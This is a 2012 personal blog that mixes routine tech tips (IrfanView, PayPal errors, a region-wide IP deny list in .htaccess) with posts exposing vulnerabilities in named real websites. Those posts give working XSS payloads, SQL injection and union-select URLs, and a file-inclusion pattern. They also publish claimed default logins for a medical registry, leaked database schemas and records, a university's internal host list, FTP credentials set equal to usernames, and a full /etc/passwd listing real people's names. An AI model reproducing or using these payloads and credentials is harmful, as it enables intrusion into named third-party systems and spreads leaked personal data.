Sunday, 30 December 2012

wiki camcom milano - manual from casaleggio associati 2010

Wednesday, 5 December 2012

ban Asian ip addresses. Ban chinese spammers with htaccess

After receiving tons of spam on a few websites I've decided to ban the whole apnic addresses

Since I've not found anything to ban the whole APNIC I've searched for the assigned classes that they manage.
How to ban chinese spammers.

P.S. I've added a few LACNIC
(last update 2012-11-16)

Download here the file or just add the content in a .htaccess file and the spam from the Asia should be gone.
Put the .htaccess in the main (or any other) folder of your website.
You can use the same approach to ban any other ipv4 address space.

__________.htaccess____________
#list retrieved from
#http://www.iana.org/assignments/ipv4-address-space/ipv4-address-space.txt

#Banning APNIC
deny from 1.0.0.0/8
deny from 14.0.0.0/8
deny from 27.0.0.0/8
deny from 36.0.0.0/8
deny from 39.0.0.0/8
deny from 42.0.0.0/8
deny from 43.0.0.0/8
deny from 49.0.0.0/8
deny from 58.0.0.0/8
deny from 59.0.0.0/8
deny from 60.0.0.0/8
deny from 61.0.0.0/8
deny from 101.0.0.0/8
deny from 103.0.0.0/8
deny from 106.0.0.0/8
deny from 110.0.0.0/8
deny from 111.0.0.0/8
deny from 112.0.0.0/8
deny from 113.0.0.0/8
deny from 114.0.0.0/8
deny from 115.0.0.0/8
deny from 116.0.0.0/8
deny from 117.0.0.0/8
deny from 118.0.0.0/8
deny from 119.0.0.0/8
deny from 120.0.0.0/8
deny from 121.0.0.0/8
deny from 122.0.0.0/8
deny from 123.0.0.0/8
deny from 124.0.0.0/8
deny from 125.0.0.0/8
deny from 126.0.0.0/8
deny from 133.0.0.0/8
deny from 150.0.0.0/8
deny from 153.0.0.0/8
deny from 163.0.0.0/8
deny from 171.0.0.0/8
deny from 175.0.0.0/8
deny from 180.0.0.0/8
deny from 182.0.0.0/8
deny from 183.0.0.0/8
deny from 202.0.0.0/8
deny from 203.0.0.0/8
deny from 210.0.0.0/8
deny from 211.0.0.0/8
deny from 218.0.0.0/8
deny from 219.0.0.0/8
deny from 220.0.0.0/8
deny from 221.0.0.0/8
deny from 222.0.0.0/8
deny from 223.0.0.0/8
__________end of .htaccess____________

Don't do it if you have contents that should be available to Asian people.
I'm not racists but the contents of my website is not intended for asian people and any asian person can understand that I'm just cutting down the spam in websites where the content is not supposed to be read by non eu persons.

You can also redirect the persons to other pages (ex. a form).

Saturday, 20 October 2012

[Solved] Irfanview "disk is full" error

While using the batch processing of Irfanview you can encounter this error: "disk is full".
The error happens when you've set to overwrite thre previous files (advanced conversion settings) and they are *locked*.
Check if the file can be written by your Windows User, check that the file is not read only, check if the file is not locked by another process.


______________________Remove read only____________________
Right-click on the file.
Click on Properties.
Click on General tab, clear the Read-only check box, and then click OK (confirm also to apply to all the subfolders.
___________________________________

Thursday, 11 October 2012

AMD PCNET Family PCI Ethernet Adapter - Windows XP, 2003 Drivers




It could happen that you cannot find the drivers (AMD PCNET Family PCI Ethernet Adapter - not installed) of the ethernet (nic) adapter that is used in  virtualbox.

 PCI\VEN_1022&DEV_2000&SUBSYS_20001022&REV_40\3&267A616A&0&18

I've found also this link https://www.virtualbox.org/ticket/3411 but I was unable to see a working download.


Since the links to the amd websites are failing and it seems that they canno be found website I'm adding a new link.


Here you can download the  Drivers AMD PCNET for Virtualbox

They have been tested with Windows XP 32bit  and Virtualbox 4.2.0 r80737 .
After a bit of time I've tested them with Windows 7 pro 32bit (a slim version) and they work.
They also work on Windows 2003 R2 (thanks to David Acosta).


If you have a direct link to the AMD website or any other good information just add it in the comments.

Tuesday, 17 April 2012

http://www.hstl.crhst.cnrs.fr | XSS

http://www.hstl.crhst.cnrs.fr/i-corpus/histmap/informations/bollettino.php?lang=en%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E%3C%22

vanthuanobservatory | sql injection

SQL Injection
http://www.vanthuanobservatory.org/bollettini-dsc/bollettino.php?lang=en

http://www.mnitalia.com | php local file inclusion, privileges escalation, system compromise

sample page
http://www.mnitalia.com/home/index.php?page=page.php&cat=webmarketing

http://www.mnitalia.com/home/index.php?page={file inclusion here}&cat=*

primomaggio.com | XSS

POST
http://www.primomaggio.com/newsletter.php

POSTDATA
nome=chick&cognome=chick&email=%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3Echick%40mailinator.com&x=40&y=7&send=1

_____
An Sql injection was available in the login area of the forum of the previous website (in asp as far as I can remember).

http://infopoint.atac.roma.it | xss

http://infopoint.atac.roma.it/bw.asp?lingua=ita%22%3E%3C/script%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E%3Cscript%20src=%22

http://www.micron.com | XSS

http://www.micron.com/search?q=%3Cscript%3Ealert%28document.cookie%29%3b%3C%2fscript%3E

Thursday, 15 March 2012

Paypal PDT/IPN - HTTP Error 302

 Paypal PDT/IPN - HTTP status Error 302 happens when you are contacting paypal via http while (as far as I can understand) they have enforced the requests to be via SSL (443 https)  and not in simple http requests (80 http).
It happens in sandbox and live.

Paypal PDT error 4003 problem

The Paypal error 4003 (when receiving PDT) could happen the server is doing too many requests/validations for the same "tx" (transaction id) with a cmd=_notify-synch. Paypal will not send back the data after about 5 requests.

Sometimes the error could happen randomly in sandbox. This shouldn't happen in "live".

Paypal merchant_return_link problem

merchant_return_link=click+here
merchant_return_link=return+to+merchant
merchant_return_link=*



it could happen if:
the client browser is clicking the button while not accepting/using/respecting the META tag redirection
the autoreturn is set to off in the the merchant account

an url rewriting could be a solution

Thursday, 16 February 2012

ior.it | default account???

http://www.ior.it/RegMed/Web/Login.aspx
user: RegMed


 pass: pippero
user: admin
pass: colon

 --------------------------------
It's possible  to change the password of any user by knowing only the username (????).

Saturday, 11 February 2012

antiproibizionisti.it | Sql injections, data leak, system compromise

Since the website has been closed (I'm sorry for that).


Some (old) informations.


***Remember that I've never abused of any website or modified anything or used confidential data.***


http://www.antiproibizionisti.it/ricerca.asp?page=1&trova=(%20Advid%20)';%20trunca

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][Driver ODBC Microsoft Access] Errore di sintassi (operatore mancante) nell'espressione della query



/inc_ricerca.htm, line 12



--------------
http://antiproibizionisti.it/archivio_sdf.asp?f=1'0

http://antiproibizionisti.it/display_gessa.asp?f=3629&u='9
http://antiproibizionisti.it/archivio_gessa.asp?f='9

http://antiproibizionisti.it/display.asp?f=4177&u=10

http://antiproibizionisti.it/archivio_sdf.asp?f=10%20union%20select%20sum(nome),1,2,3,6,4,4,5%20from%20user
http://antiproibizionisti.it/archivio_sdf.asp?f=10%20UNION%20SELECT%20id,%20name,%20'','','','','',''%20FROM%20user


http://antiproibizionisti.it/archivio_sdf.asp?f=10%20union%20select%201,1,1,1%20from%20user%20where%20%20id=1




http://antiproibizionisti.it/display.asp?f=4177&u=1%20union%20select%20id,nome,cognome,pass,1,1,1,1%20from%20user
http://antiproibizionisti.it/display_sdf.asp?f=4840&u=10



ID
IDutente

-----
File leggibili
/inc_archiviofilo_sdf.htm
/inc_ricerca.htm

existing files that are not available from the web
modifica.asp
pass.asp
mail.asp
news.asp
delnews.asp
editnews.asp


database
mdb-database/notizie.mdb


GET /admin/delnews.asp HTTP/1.1
Host: antiproibizionisti.it


-----------------------------------------------------


parts of the DB SCHEMA


-news
->titolo
->testo
->titoletto
->data

-user  --- 8 columns
->ID
->nome
->cognome
->pass


-filodiretto
->IDutente
->risposta
->data_dom

askyp.com | sql data dump, data leak

Too much data to dump. Anyway I've deleted everything (here ... ).
--- samples ---

company_address (
  company_id bigint(3) NOT NULL auto_increment,
  company_name varchar(200) NOT NULL default '',
  address longtext,
  street_id bigint(3) default NULL,
  city_id bigint(3) default NULL,
  state_id bigint(3) default NULL,
  zip varchar(20) default NULL,
  phone varchar(20) NOT NULL default '0',
  fax varchar(20) default NULL,
  email varchar(100) default NULL,
  category char(1) NOT NULL default '',
  PRIMARY KEY  (company_id)

INSERT INTO company_address VALUES("1", "M & A Hispanic Book Store", "1902 Bergenline Ave", "0", "16284", "30", "07087", "(201) 866-0010", "", "", "0");

------------------------------------------

64.233.183.104 (??? google ???) | sql data dump, data leak

I've found this data time ago...

CREATE TABLE partners (
  id int(11) NOT NULL auto_increment,
  email varchar(255) NOT NULL default '',
  phone varchar(50) default NULL,
  fax varchar(50) default NULL,
  address varchar(255) default NULL,
  zip varchar(20) default NULL,
  city varchar(50) default NULL,
  state varchar(50) default NULL,
  country varchar(50) default NULL,
  first_name varchar(100) default NULL,
  last_name varchar(100) default NULL,
  company_name varchar(100) default NULL,
  login varchar(25) NOT NULL default '',
  password varchar(25) NOT NULL default '',
  additional_data text,
  ku_balance float(16,2) unsigned NOT NULL default '0.00',
  us_balance float(16,2) unsigned NOT NULL default '0.00',
  credit_limit float(10,2) default '0.00',
  status enum('unconfirmed','active','suspended','free') default 'unconfirmed',
  promo varchar(100) default NULL,
  partner_group varchar(40) default NULL,
  date datetime default NULL,
  discount_id int(11) NOT NULL default '0',
  level int(3) default '0',
  new_ip_page enum('0','1') default NULL,
  PRIMARY KEY  (id)
) TYPE=MyISAM;


INSERT INTO partners VALUES (35,'farlep@
********.com','+38(048)**************','+38(048)*******','Gukovskogo........
etc etc <data_var website_name>yuriy</data_var website_name><data_var website_url>yuriy</data_var website_url><data_var description>yuriy</data_var description><data_var visitors> .... etc etc

(I've added the asterisks)
I don't know if the server is related to google anyway the partners are
AT @ -> scmholding.com, apexhost.com, kemford.com, instasites.net, geoffcweb.com, etc etc

Who knows ...

nursery-info.net | Sql injection, data leak (sql dumps), system compromise

the website is dead so ... I can publish something

The main table

nurseryinfo (
   Title text,
   Initial text,
   First_Name text,
   Surname text,
   Contact_Name text,
   Position text,
   Nursery text,
   Address text,
   Address1 text,
   Town text,
   County text,
   Postcode text,
   Tel_No text,
   No_0_2 text,
   Range text,
   Weekly text,
   Tot_Staff text,
   Group_No text,
   Facility text,
   Member_No text,
   Branch text,
   Region text,
   Officer_Br text,
   Officer_Re text,
   Officer_Ex text,
   Year_Joined text,
   Eig text,
   Contact text,
   Task_Group text,
   _998 text,
   No_of_Nurs text,
   So text,
   Fax_No text,
   Renewed text,
   Bulletin text,
   E_Mail text,
   Mem_Type text,
   Fees_Paid text,
   Paid text,
   Month_Join text,
   Membership text,
   NDNA text,
   Chair text,
   Regional_R text,
   Chairtel_N text,
   Rep_Tel_No text,
   Ass text,
   Primary_ text,
   Add_site text,
   Head_offic text,
   No_2_3 int(11),
   No_3_5 int(11),
   No_5 int(11),
   Reg_Authty text,
   Qual_Staff int(11),
   Anc_Staff int(11),
   Year_Est_S int(11),
   Voting text,
   Joined_200 text,
   DW_Area text,
   Expires text,
   Notes text,
   Network text,
   Char_Don text,
   Date_Dontd text,
   Registered text,
   Accounts_2 text,
   Reg_Accs_2 text,
   QualityControl text

meridiana.it | SQL Injection

Since the injection have been fixed time ago ... I just publish some samples (nothing confidential)

Sample error
[TCX][MyODBC]You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '' ORDER BY N1 ASC, ID_Head DESC' at line 1

/ita/web/index.asp, line 15


db: Sql39909_2
sample table -> clienti
columns -> cliente, indirizzo, data, telefono

sample injection
http://www.meridianaitalia.it/ita/web/index.asp?id_menu=3%20UNION%20Select%20*%20from%20Sql39909_2.clienti/*&menu=Newa

Monday, 6 February 2012

old unisannio.it hosts (2003/2004?)

ns.unisannio.it
mail.unisannio.it
www.unisannio.it
ftp.unisannio.it
nosferatu.unisannio.it
medusa.unisannio.it
hydra.ing.unisannio.it
proxy.unisannio.it
webmail.unisannio.it
gw-0.unisannio.it
wwwsci.unisannio.it
wwwlavoro.unisannio.it
wwwdases.unisannio.it
wwwdsga.unisannio.it
wwwdsba.unisannio.it
wwwstat.unisannio.it
wwwsea.unisannio.it
wwwding.unisannio.it
web.ing.unisannio.it
virgilio.ing.unisannio.it
wheel.ing.unisannio.it
caudina.ing.unisannio.it
serg.ing.unisannio.it
russo.ing.unisannio.it
contabile.ing.unisannio.it
opac.ing.unisannio.it
sgr.ing.unisannio.it
serglink.ing.unisannio.it
ponza.ing.unisannio.it
deal.ing.unisannio.it
gvp.ing.unisannio.it
contabile.ing.unisannio.it
canfora.ing.unisannio.it
paradise.ing.unisannio.it
lisus1.ing.unisannio.it
lisus2.ing.unisannio.it
lisus3.ing.unisannio.it
leus.ing.unisannio.it
leus-ws1.ing.unisannio.it
leus-ws2.ing.unisannio.it
lesim1.ing.unisannio.it
lesim2.ing.unisannio.it
lesim3.ing.unisannio.it
lesim4.ing.unisannio.it
disanto.ing.unisannio.it
francof.ing.unisannio.it
gw-64.ing.unisannio.it
h97.ing.unisannio.it
golem.ing.unisannio.it
thewavesgroup.ing.unisannio.it
cem.ing.unisannio.it
paradise-np.ing.unisannio.it
continillo.ing.unisannio.it
h103.ing.unisannio.it
h104.ing.unisannio.it
h105.ing.unisannio.it
h106.ing.unisannio.it
h107.ing.unisannio.it
h108.ing.unisannio.it
h109.ing.unisannio.it
h110.ing.unisannio.it
feanor.ing.unisannio.it
h112.ing.unisannio.it
h113.ing.unisannio.it
h114.ing.unisannio.it
h115.ing.unisannio.it
h116.ing.unisannio.it
h117.ing.unisannio.it
h118.ing.unisannio.it
h119.ing.unisannio.it
h120.ing.unisannio.it
h121.ing.unisannio.it
h122.ing.unisannio.it
videoconf.ing.unisannio.it
h124.ing.unisannio.it
h125.ing.unisannio.it
gw-96.ing.unisannio.it
ns.rcost.unisannio.it
www.rcost.unisannio.it
h03.rcost.unisannio.it
h04.rcost.unisannio.it
h05.rcost.unisannio.it
h06.rcost.unisannio.it
h07.rcost.unisannio.it
h08.rcost.unisannio.it
h09.rcost.unisannio.it
h10.rcost.unisannio.it
h11.rcost.unisannio.it
h12.rcost.unisannio.it
h13.rcost.unisannio.it
h14.rcost.unisannio.it
h15.rcost.unisannio.it
h16.rcost.unisannio.it
h17.rcost.unisannio.it
h18.rcost.unisannio.it
h19.rcost.unisannio.it
h20.rcost.unisannio.it
h21.rcost.unisannio.it
h22.rcost.unisannio.it
h23.rcost.unisannio.it
h24.rcost.unisannio.it
h25.rcost.unisannio.it
h26.rcost.unisannio.it
h27.rcost.unisannio.it
h28.rcost.unisannio.it
nat.rcost.unisannio.it
gw.rcost.unisannio.it
bosco-gw.unisannio.it
boscobri-gw.unisannio.it
hicom-gw.unisannio.it
ceda-backup-gw.unisannio.it
dialup.unisannio.it
calandra-gw.unisannio.it
guerrazzi1-gw.unisannio.it
guerrazzi0-gw.unisannio.it
mulini-gw.unisannio.it
calandra0-gw.unisannio.it
calandra1-gw.unisannio.it
battistine-gw.unisannio.it
unisannio-gw.unisannio.it

old joe accounts of free websites

----ftp.tripod.it----
ftp.tripod.it:21  U: angelo  P: angelo
ftp.tripod.it:21  U: apostolo  P: apostolo
ftp.tripod.it:21  U: arny  P: arny
ftp.tripod.it:21  U: basa  P: basa
ftp.tripod.it:21  U: bedford  P: bedford
ftp.tripod.it:21  U: bonnin  P: bonnin
ftp.tripod.it:21  U: bubak  P: bubak
ftp.tripod.it:21  U: bucky  P: bucky
ftp.tripod.it:21  U: carlton  P: carlton
ftp.tripod.it:21  U: cora  P: cora
ftp.tripod.it:21  U: cozzi  P: cozzi
ftp.tripod.it:21  U: derby  P: derby
ftp.tripod.it:21  U: elin  P: elin
ftp.tripod.it:21  U: emr  P: emr
ftp.tripod.it:21  U: evelina  P: evelina
ftp.tripod.it:21  U: evita  P: evita
ftp.tripod.it:21  U: fania  P: fania
ftp.tripod.it:21  U: fara  P: fara
ftp.tripod.it:21  U: federico  P: federico
ftp.tripod.it:21  U: ferdy  P: ferdy
ftp.tripod.it:21  U: fisher  P: fisher
ftp.tripod.it:21  U: francine  P: francine
ftp.tripod.it:21  U: gareth  P: gareth
ftp.tripod.it:21  U: gonzalez  P: gonzalez
ftp.tripod.it:21  U: gussy  P: gussy
ftp.tripod.it:21  U: hakan  P: hakan
ftp.tripod.it:21  U: jeanette  P: jeanette
ftp.tripod.it:21  U: jeremy  P: jeremy
ftp.tripod.it:21  U: josephs  P: josephs
ftp.tripod.it:21  U: kassie  P: kassie
ftp.tripod.it:21  U: kinch  P: kinch
ftp.tripod.it:21  U: lac  P: lac
ftp.tripod.it:21  U: las  P: las
ftp.tripod.it:21  U: leni  P: leni
ftp.tripod.it:21  U: leone  P: leone
ftp.tripod.it:21  U: luu  P: luu
ftp.tripod.it:21  U: lynn  P: lynn
ftp.tripod.it:21  U: mado  P: mado
ftp.tripod.it:21  U: marino  P: marino
ftp.tripod.it:21  U: mathieu  P: mathieu
ftp.tripod.it:21  U: maureen  P: maureen
ftp.tripod.it:21  U: medel  P: medel
ftp.tripod.it:21  U: miceli  P: miceli
ftp.tripod.it:21  U: milor  P: milor
ftp.tripod.it:21  U: minority  P: minority
ftp.tripod.it:21  U: mischa  P: mischa
ftp.tripod.it:21  U: niki  P: niki
ftp.tripod.it:21  U: polla  P: polla
ftp.tripod.it:21  U: scorpio  P: scorpio
ftp.tripod.it:21  U: sforza  P: sforza
ftp.tripod.it:21  U: siva  P: siva
ftp.tripod.it:21  U: soin  P: soin
ftp.tripod.it:21  U: sosa  P: sosa
ftp.tripod.it:21  U: souther  P: souther
ftp.tripod.it:21  U: starlet  P: starlet
ftp.tripod.it:21  U: tedi  P: tedi
ftp.tripod.it:21  U: toba  P: toba
ftp.tripod.it:21  U: tommaso  P: tommaso
ftp.tripod.it:21  U: wan  P: wan
ftp.tripod.it:21  U: wilfred  P: wilfred
ftp.tripod.it:21  U: winni  P: winni
ftp.tripod.it:21  U: yun  P: yun


----mail.freemail.it----
ahmed
alasdair
alison
allegra
allis
alwin
amalia
amelia
andriana
annetta
antony
arto
astrix
austen
azar
beck
belk
benson
bertha
berti
bice
bina
blau
bogart
brad
bradley
britney
brothers
bruno
burnaby
burt
cameron
carola
castro
caty
cecilia
celle
cesare
chaya
chev
cicero
circe
class
clemmie
colly
connie
consulta
cora
correa
creative
cris
curcio
cupido
dada
dale
darla
deana
dede
deluca
desi
diamond
domenico
domingo
dora
econ
edwin
elisabet
elsa
elvira
enrica
ernesto
erwin
este
faisal
faustina
fearless
felicio
fergus
fina
fishman
flint
florinda
foley
follett
franky
fuller
galvin
gare
gass
ge
genia
gerardo
gibbons
giusto
goldberg
goldie
grego
guglielm
guillaum
gurley
harley
hector
helena
henri
hine
honey
hoover
iago
ileana
isabell
jackson
jann
joann
joanne
johny
joseph
kally
kara
karil
karin
kari
karol
katina
keep
kendall
keynes
kilian
krull
kyrie
larry
laser
lavina
leander
levi
leyton
lizzy
louise
luciano
lucio
lodovico
luis
lunk
luther
makoto
marano
marcos
mariam
mariotti
marks
marlo
marve
marven
masini
massone
mateo
matilde
maurino
mcmanus
melinda
mella
melody
milo
minnie
mmail
modestos
moja
momon
moses
myer
myrah
nancy
networks
newport
nichole
nikola
ninetta
ninno
ninja
noname
norberto
norma
oded
ophelia
opus
orca
orsola
page
palermo
pancho
para
paulette
pepi
pepe
philip
picard
pietro
pooh
prisca
priya
quintina
rachmani
rami
ramona
rana
reader
rebecca
reis
renate
renny
rizzo
roland
rossy
ruby
rufino
russel
rusty
sabina
salim
sanchez
santiago
satin
scottie
seka
selena
sergei
shaker
shana
shiva
shlomo
siva
sonni
sousa
spencer
stephi
student
sunil
susanna
susanne
sutter
sylvia
talbot
tara
temp
thom
tigger
tim
timothy
tony
tosca
trent
tripp
tropea
tuan
tuckie
ully
ulrich
valma
verde
waters
willie
witold
yousef



NOTE: Those websites/hosts/servers have been shut down a long time ago. This is why I'm publishing such informations.

Old accounts, dead websites, old passwd

www.dmyouhak.com:21  U/P: ynws
www.dmyouhak.com:21  U/P: daeil24
---------------------------------------




-------shell4.unixshells.de-------
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
adm:x:3:4:adm:/var/adm:
lp:x:4:7:lp:/var/spool/lpd:
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:
news:x:9:13:news:/var/spool/news:
uucp:x:10:14:uucp:/var/spool/uucp:
operator:x:11:0:operator:/root:
games:x:12:100:games:/usr/games:
gopher:x:13:30:gopher:/usr/lib/gopher-data:
ftp:x:14:50:FTP User:/var/ftp:
nobody:x:99:99:Nobody:/:
apache:x:48:48:Apache:/var/www:/bin/false
rpc:x:32:32:Portmapper RPC user:/:/bin/false
mailnull:x:47:47::/var/spool/mqueue:/dev/null
xerox:x:500:500:xerox:/home/xerox:/bin/bash
kwmo37:x:501:100::/home/kwmo37:/bin/bash
sopl69:x:502:100::/home/sopl69:/bin/bash
schnakey:x:514:920:Eberle Frank:/home/schnakey:/bin/bash
pr0t3ct:x:516:920:Jeske Joerg:/home/pr0t3ct:/bin/bash
wiggs0r:x:517:920:Jäckel Matthias:/home/wiggs0r:/bin/ushell
H5386B:x:524:920:Athmer Johannes:/home/H5386B:/bin/ushell
dune1:x:528:920:Schreiter Tilo:/home/dune1:/bin/bash
thyla:x:529:920:Kriebitz Cornelia:/home/thyla:/bin/bash
mue:x:531:920:Mücke Andreas:/home/mue:/bin/ushell
loewe69:x:532:920:Matzerath Frank:/home/loewe69:/bin/bash
coreit:x:536:920:Reder Daniel:/home/coreit:/bin/ushell
alexa:x:538:920:Berger Reinhard:/home/alexa:/bin/bash
deadfish:x:542:920:Sättler Markus:/home/deadfish:/bin/bash
falke:x:543:920:Homburg Tim:/home/falke:/bin/ushell
looser:x:546:920:Knappstein Thomas:/home/looser:/bin/bash
botshell:x:547:920:Lange Sebastian:/home/botshell:/bin/bash
icecold:x:550:920:Holtkamp Martin:/home/icecold:/bin/ushell
dragon:x:554:920:Nickel Christian:/home/dragon:/bin/bash
HellCop:x:556:920:Lehnen Thomas:/home/HellCop:/bin/bash
Hardwire:x:557:920:Böttjer Marco:/home/Hardwire:/bin/ushell
draven:x:562:920:Ogris Christian:/home/draven:/bin/ushell
engel1:x:563:920:Schmelzer Sven:/home/engel1:/bin/bash
sw77rtx:x:566:920:Meinhardt Andreas:/home/sw77rtx:/bin/bash
Matrix2k:x:581:920:Schrake Marcel:/home/Matrix2k:/bin/bash
FlatRate:x:582:900:Schnepf Andreas:/home/FlatRate:/bin/bash
tenjou:x:592:900:Kalthoff Rainer:/home/tenjou:/bin/bash
killer:x:609:700:Herrmann Armin:/home/killer:/bin/bash
davide:x:610:100:pietro paganoni:/home/davide:/bin/bash
ruzz:x:617:100:sanchez vidal javier:/home/ruzz:/bin/bash
blub_1:x:619:100:Bräunig Erich:/home/blub_1:/bin/bash
gammaray:x:639:900:Möhle Gunther:/home/gammaray:/bin/bash
markyg:x:641:100:garland mark:/home/markyg:/bin/ushell
katz:x:652:501:Katz Jochen:/home/katz:/bin/bash
link:x:661:100:Key Anne R.:/home/link:/bin/bash
Urli:x:667:501:Schweitzer Thorsten:/home/Urli:/bin/ushell
nos:x:670:900:Luciani Paola:/home/nos:/bin/ushell
mary:x:676:501:overbrook place angie:/home/mary:/bin/bash
jorge_hh:x:681:600:Davidsohn Jorge:/home/jorge_hh:/bin/bash
kirpi:x:687:2000:Popp Günther:/home/kirpi:/bin/bash
p3885371:x:688:110:Pingel Daniel:/home/p3885371:/bin/ushell
rexirtaM:x:692:1400:Wieck Ronny:/home/rexirtaM:/bin/ushell
Freestyl:x:696:100:Schulz Hans-Jürgen:/home/Freestyl:/bin/bash
CarloMHL:x:698:100:Rimpel Karl-Heinz:/home/CarloMHL:/bin/bash
teeeuk:x:700:100:bailey eve:/home/teeeuk:/bin/bash
moclam:x:702:1400:zampieri oscar:/home/moclam:/bin/bash
TheBoss:x:703:900:Lazar Cristian:/home/TheBoss:/bin/bash
nachos:x:706:100:Lahr Florian:/home/nachos:/bin/bash
necrobot:x:708:900:Wimmer Oliver M.:/home/necrobot:/bin/bash
freak:x:718:900:Soldato Kevin:/home/freak:/bin/bash
AnnaLena:x:727:900:Huck Sebastian:/home/AnnaLena:/bin/bash
kilyan:x:731:100:Cardella Giuseppe:/home/kilyan:/bin/bash
abba:x:736:900:De Santis Francesco:/home/abba:/bin/bash
vania:x:740:1400:Oscar Zampieri:/home/vania:/bin/bash
mod:x:748:900:Eiberger Peter:/home/mod:/bin/bash
bluecat:x:749:110:Nesi Sandra:/home/bluecat:/bin/ushell
marcus:x:752:900:Leffler Marcus:/home/marcus:/bin/bash
Basc:x:753:900:Schaefer Bastian:/home/Basc:/bin/ushell
one:x:758:900:Podkanski Thomas:/home/one:/bin/ushell
narcis:x:759:900:Luca Narcis:/home/narcis:/bin/ushell
HSP:x:761:900:Koss Marcel:/home/HSP:/bin/bash
Skyn3t:x:769:110:Cerato Lodovico:/home/Skyn3t:/bin/ushell
gemelli:x:772:1400:magni oliviero:/home/gemelli:/bin/bash
cool771:x:777:910:hartmann markus:/home/cool771:/bin/bash
BEATLES:x:780:110:FRADEGRADI AMELIO:/home/BEATLES:/bin/ushell
remove:x:784:1400:Katts Hank:/home/remove:/bin/ushell
rachel:x:790:900:jonsson stillit cinzia:/home/rachel:/bin/bash
martina:x:792:1400:Oscar Zampieri:/home/martina:/bin/bash
d-fiant:x:796:501:Hartung Tim:/home/d-fiant:/bin/bash
GrafBot:x:799:900:Bier Frederic:/home/GrafBot:/bin/ushell
volley:x:807:900:Francesco De Santis:/home/volley:/bin/bash
speyburn:x:808:110:endlich mitch:/home/speyburn:/bin/bash
espilce:x:813:1400:Oscar Zampieri:/home/espilce:/bin/bash
gold:x:814:401:Balice Stefano:/home/gold:/bin/bash
DM33:x:815:900:Gubo Johannes:/home/DM33:/bin/bash
DJquattr:x:820:110:Schmidt Martin:/home/DJquattr:/bin/ushell
Voegli:x:821:900:Zimmermann Manuel:/home/Voegli:/bin/ushell
B1tch:x:822:900:kolmer christian:/home/B1tch:/bin/ushell
quasar:x:825:100:Virdis Francesco:/home/quasar:/bin/bash
Arzan:x:827:910:Tondelli Marco:/home/Arzan:/bin/bash
kai:x:831:900:Wiederich Kai:/home/kai:/bin/ushell
popa3d:x:835:2001::/dev/null:/dev/null
gnikeht:x:842:1400:Mario Ghersi:/home/gnikeht:/bin/bash
lovely:x:843:900:pogotrestkaya valerie:/home/lovely:/bin/ushell
DarkCrow:x:844:700:Borges Christian:/home/DarkCrow:/bin/ushell
igor75:x:845:501:Baur Andreas:/home/igor75:/bin/bash
muffl0n:x:852:900:Schliesing Sven:/home/muffl0n:/bin/bash
defi:x:855:900:Massong Thomas:/home/defi:/bin/bash
papa:x:856:900:Soldato Kevin:/home/papa:/bin/bash
Nemesis2:x:857:100:Götz Jürgen:/home/Nemesis2:/bin/ushell
baum:x:858:910:setzer christian:/home/baum:/bin/bash
winzky:x:859:401:Ryder James:/home/winzky:/bin/bash
BGK:x:860:1400:Skarphedinsson Ingolfur:/home/BGK:/bin/bash
rekoJ:x:862:1400:Ovini Renato:/home/rekoJ:/bin/bash
dupe004:x:863:900:tardy Werner:/home/dupe004:/bin/ushell
penguin:x:870:910:Schankweiler Tobias:/home/penguin:/bin/bash
lajja:x:877:110:Basinger Melvin:/home/lajja:/bin/ushell
spookydj:x:883:110:Scaffidi Domian Salvatore Domen:/home/spookydj:/bin/bash
xovaviv:x:887:1400:zanasi franco:/home/xovaviv:/bin/bash
dca1:x:889:110:paganoni pietro:/home/dca1:/bin/bash
frozzz3:x:891:1400:balboa rocky:/home/frozzz3:/bin/ushell
GiGiDaG:x:892:520:TOMMASO SANGUIGNI:/home/GiGiDaG:/bin/bash
Orion:x:899:501:Blaas Jürgen:/home/Orion:/bin/bash
wario:x:902:110:garozzo mario:/home/wario:/bin/bash
Sled:x:903:2000:Rieger Thomas:/home/Sled:/bin/bash
druido:x:905:110:magni oliviero:/home/druido:/bin/bash
Boss:x:914:100:Tisbo Benedetto:/home/Boss:/bin/bash
quizzica:x:917:1400:Eduan Boqir:/home/quizzica:/bin/ushell
Miss_X:x:921:501:Jurincic Alen:/home/Miss_X:/bin/ushell
drew:x:922:110:Miller Drew:/home/drew:/bin/bash
bl4d3:x:923:910:Spadari Lorenzo:/home/bl4d3:/bin/ushell
bota:x:924:910:andrew Brandino:/home/bota:/bin/ushell
Rod:x:925:1400:Frank Stefan:/home/Rod:/bin/bash
RAGE:x:928:100:Allaway Chris:/home/RAGE:/bin/ushell
tornado:x:929:110:Bedwell John:/home/tornado:/bin/bash
thewall:x:930:900:Monteleone Lorenzo:/home/thewall:/bin/ushell
guard:x:932:1400:Martinelli Sharon C:/home/guard:/bin/ushell
OAREV:x:934:1400:ZANASI FRANCO:/home/OAREV:/bin/ushell
pod:x:935:200:Beier Maximilian:/home/pod:/bin/ushell
nwarht:x:936:700:Frohnert Fabio:/home/nwarht:/bin/bash
pDee:x:938:900:Krug Alexander:/home/pDee:/bin/bash
simona:x:939:910:Di Lorenzo Roberto:/home/simona:/bin/bash
DarkMark:x:941:900:Knaack Joram:/home/DarkMark:/bin/ushell
ngl:x:943:400:Paol Casey:/home/ngl:/bin/ushell
luma:x:946:900:Schindler Oliver:/home/luma:/bin/bash
rekees:x:947:700:strohschen Dirk:/home/rekees:/bin/ushell
xtra:x:949:110:Bedsaul Alan:/home/xtra:/bin/bash
Wombad:x:951:110:Pilz Han:/home/Wombad:/bin/bash
skace:x:952:900:Kiehne Stefan:/home/skace:/bin/ushell
private:x:953:850:Anderson Silvia:/home/private:/bin/ushell
samy:x:954:850:Schrauth Dominik:/home/samy:/bin/bash
Bottane:x:957:900:De Min Nicholas:/home/Bottane:/bin/bash
tnel01v:x:958:1400:Qayum Mizan:/home/tnel01v:/bin/bash
d3lta:x:959:401:conti daniele:/home/d3lta:/bin/bash
onez:x:964:910:Allen Newkirk Craig:/home/onez:/bin/bash
Kosh:x:965:302:Strohschen Dirk:/home/Kosh:/bin/ushell
